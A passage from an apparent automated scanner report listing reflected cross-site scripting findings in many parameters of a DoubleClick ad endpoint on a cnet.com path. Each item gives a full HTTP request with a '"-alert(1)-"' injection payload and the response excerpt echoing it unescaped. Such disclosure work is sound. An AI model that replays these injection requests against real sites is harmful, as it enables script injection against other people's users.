GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3bddae"-alert(1)-"32d4a8875d7&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3bddae"-alert(1)-"32d4a8875d7&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://
...[SNIP]...

3.171. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9cf4"-alert(1)-"67ea7960a5 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=c9cf4"-alert(1)-"67ea7960a5&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
p://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=c9cf4"-alert(1)-"67ea7960a5&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q10000001403000
...[SNIP]...

3.172. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd56a"-alert(1)-"5892d568ade was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=bd56a"-alert(1)-"5892d568ade HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7294
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:20:36 GMT
Expires: Wed, 27 Apr 2011 23:20:36 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=bd56a"-alert(1)-"5892d568adehttp://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN074");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcall
...[SNIP]...

3.173. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1263e"-alert(1)-"fe5cbeb2d43 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn1263e"-alert(1)-"fe5cbeb2d43&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/%2a/d%3B240097948%3B0-0%3B0%3B61926988%3B4307-300/250%3B41748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn1263e"-alert(1)-"fe5cbeb2d43&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=n
...[SNIP]...

3.174. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89ab5"-alert(1)-"f00fa922e97 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US89ab5"-alert(1)-"f00fa922e97&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
48%3B2-0%3B0%3B61926988%3B4307-300/250%3B41900386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US89ab5"-alert(1)-"f00fa922e97&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwY
...[SNIP]...

3.175. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99b24"-alert(1)-"62791cafedf was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=3111699b24"-alert(1)-"62791cafedf&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3B4307-300/250%3B41748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=3111699b24"-alert(1)-"62791cafedf&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.
...[SNIP]...

3.176. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8d07"-alert(1)-"853a60c8716 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253ac8d07"-alert(1)-"853a60c8716&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7/166/%2a/d%3B240097948%3B0-0%3B0%3B61926988%3B4307-300/250%3B41748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253ac8d07"-alert(1)-"853a60c8716&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243
...[SNIP]...

3.177. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76fd8"-alert(1)-"b133118e764 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=76fd8"-alert(1)-"b133118e764&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
s%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=76fd8"-alert(1)-"b133118e764&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q10000
...[SNIP]...

3.178. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de79b"-alert(1)-"244fdf90e7b was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.comde79b"-alert(1)-"244fdf90e7b&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.comde79b"-alert(1)-"244fdf90e7b&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNA
...[SNIP]...

3.179. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14b30"-alert(1)-"7bf3c7cc635 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=214b30"-alert(1)-"7bf3c7cc635&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7306

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/e%3B240097948%3B1-0%3B0%3B61926988%3B4307-300/250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=214b30"-alert(1)-"7bf3c7cc635&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3
...[SNIP]...

3.180. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc97"-alert(1)-"306082136f6 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

